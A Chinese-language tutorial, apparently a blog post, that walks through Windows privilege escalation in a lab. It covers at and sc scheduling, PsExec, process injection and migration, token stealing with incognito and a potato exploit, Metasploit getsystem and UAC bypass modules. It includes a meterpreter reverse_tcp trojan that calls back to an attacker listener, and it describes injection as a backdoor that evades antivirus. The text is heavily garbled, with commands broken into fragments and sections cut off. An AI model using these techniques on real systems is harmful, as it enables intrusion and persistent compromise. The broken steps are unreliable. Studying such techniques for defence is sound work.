令牌窃取、UNC提权、进程注入等提权1.

在之前的文章中已经对Windows的权限提升进行了介绍这里同样不再赘述如果想要去了解Windows权限提升可以看以下的文章同时也将Windows权限提升其它的几种办法也放在下面的文章中。

同时本来应该还写一篇第三方全家提权的但是在实际测试过程中发现有些第三方提权如果在电脑上都会自动更新比如向日葵低版本的直接无法连接向日葵官方的服务器那么提个毛权限的啊。

Windows权限提升—溢出提权

at本地命令提权主要是用于在Windows2000、Windows

2003、Windows

这里可以模拟一下操作提权使用2003系统设定一个定时任务设定10:45分启动cmd

.exe这里可以通过添加“/interactive”开启界面交互模式。

10:45

可以在msf下生成一个木马文件然后在shell交互中设置at命令进行执行程序上线后即为system权限。

2.3.2.1.

通过命令生成一共木马文件然后将这个木马文件放入2003中去执行这里其实就是模拟在上传webshell后上传后门木马文件然后执行木马文件只是这里为了方便节省了直接上传一个木马即可。

msfvenom

windows/meterpreter/reverse_tcp

LHOST192.168.10.20

windows/meterpreter/reverse_tcp

set

这里在接收到msf木马反弹回来的shell后进入shell后执行下面的命令。

11:11

通过另外再启动一个监听端口的来查看新反弹回来的权限是什么可以看到到11点11分的时候执行shell.exe反弹回来的就是system权限。

getuid3.

sc是用于与服务控制管理器和服务进行通信的命令行程序提供的功能类似于控制面板中管理工具项中的服务。

3.1.

server2003、2008、2012、2016上都能使用这里的都能只适用于sc这条命令本身。

3.2.

#其中systemcmd是服务名称大家可以随意填写binpath是启动的命令typeown是指服务这个服务属于谁typeinteractcmd/k

start

这里就是先执行第一条命令然后在执行第二条命令即可这里我执行失败是由于我之前已经测试过了正常情况下应该是第一条命令执行后显示成功。

第二条就是这样的这不不受之前测试的影响。

ps提权

pstools是微软官方工具是为windows提供的第三方工具库。

4.1.

2003/2008/2012/2016中测试都是能用的在Windows

7/8/10由于需要调用服务而个人主机通常没有这类服务所以就会出现调用失败的情况。

4.2.

通过页面上的下载tool工具集合在压缩包中找到psexec.exe工具。

4.4.2.

将psexec.exe工具上传至需要提权的系统中然后执行命令。

进程迁移注入提权

进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中这样就实现了权限提升同时注入进程提权相当于开启了一个后门

5.1.

这里如果使用的是web权限是无法执行的必须获取到类似与administrator的权限才能进行进程注入。

同时这类提权是不会被杀毒软件拦截的这是系统的一种特性。

5.2.

pinjector工具实现进程注入这里需要先下载工具然后将工具上传需要提权的系统中即可。

5.2.1.

##选择一个system权限运行的进程对此pid进程执行注入并建立侦听端口5.2.3.

操作步骤

通过使用命令将权限绑定至system权限的进程中这里选在进程最好绑定系统进程这样能够实现开机自启。

5.2.3.3.

首先需要生成一个木马然后让其上线并连接上去这里我就用之前已经生成好的木马就不再生成了在上面也提到过MSF生成木马的命令。

5.3.1.

使用命令将进程迁移进拥有system权限的进程中通过迁移后再执行命令就可以看到权限已经提升为system了。

migrate

令牌(token)是系统的临时秘钥相当于账号和密码用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。

它允许你在不提供密码或其他凭证的前提下访问网络和系统资源这些令牌将持续存在于系统中除非系统重新启动。

令牌最大的特点就是随机性不可预测黑客或软件无法猜测出令牌。

6.1.

AUTHORITY\SYSTEM就无法提权到system权限。

6.2.

首先需要将木马上传至需要提权的服务器中然后执行命令进行令牌窃取提权。

use

AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端对这个认证过程使用中间人攻击NTLM重放为“NT

AUTHORITY\SYSTEM”账户本地协商一个安全令牌。

这个过程是通过一系列的Windows

API调用实现的模仿这个令牌。

只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。

一般大多数的服务型账户IIS、MSSQL等有这个权限大多数用户级的账户没有这个权限。

6.3.2.

这里首先需要将烂土豆工具给上传至需要提权的机器中然后进行执行。

6.3.4.1.

这里网上的教程需要先查看一些条件我个人的理解是不如直接进行提权能成功则能成功不能成功那就是不能成功且在现实的环境中很多提权都会遇到问题。

6.3.4.2.

首先执行potato.exe程序然后再去加载incoginto功能其次列出目标机器可窃取的令牌然后在进行窃取。

execute

这个提权其实很简单这个MSF自动化提权和之前在溢出提权中提到的自动化提权是不一样的溢出提权中提到的自动化提权是通过比对补丁信息进行提权而这个是自动化提权是直接输入命令后MSF自动执行只会显示提权成功与失败。

7.1.

getsystem创建一个新的Windows服务设置为SYSTEM运行当它启动时连接到一个命名管道。

getsystem产生一个进程它创建一个命名管道并等待来自该服务的连接。

Windows服务已启动导致与命名管道建立连接。

该进程接收连接并调用ImpersonateNamedPipeClient从而为SYSTEM用户创建模拟令牌。

7.1.2.

这里和其它都是一样的首先需要将木马连接上msf然后输入命令进行提权。

getsystem

Control用户帐户控制)是微软为提高系统安全而在Windows

Vista中引入的新技术它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前提供权限或管理员‌密码。

也就是说一旦用户允许启动的应用程序通过UAC验证那么这个程序也就有了管理员权限。

如果我们通过某种方式劫持了通过用户UAC验证的程序那么相应的我们的程序也就实现了提权的过程。

7.2.1.

这里先搜索uac因为这里面有些uac可能对不同的系统会有不同的作用。

search

这里我们使用的是Windows7那么我们就使用exploit/windows/local/ask来执行。

use

##设置监听端口有时候返回回来会出现错误所以就另起一个监听。

这里查看一下监听看看返回的权限然后在返回的权限中再次使用getsystem发现能够提权到system权限。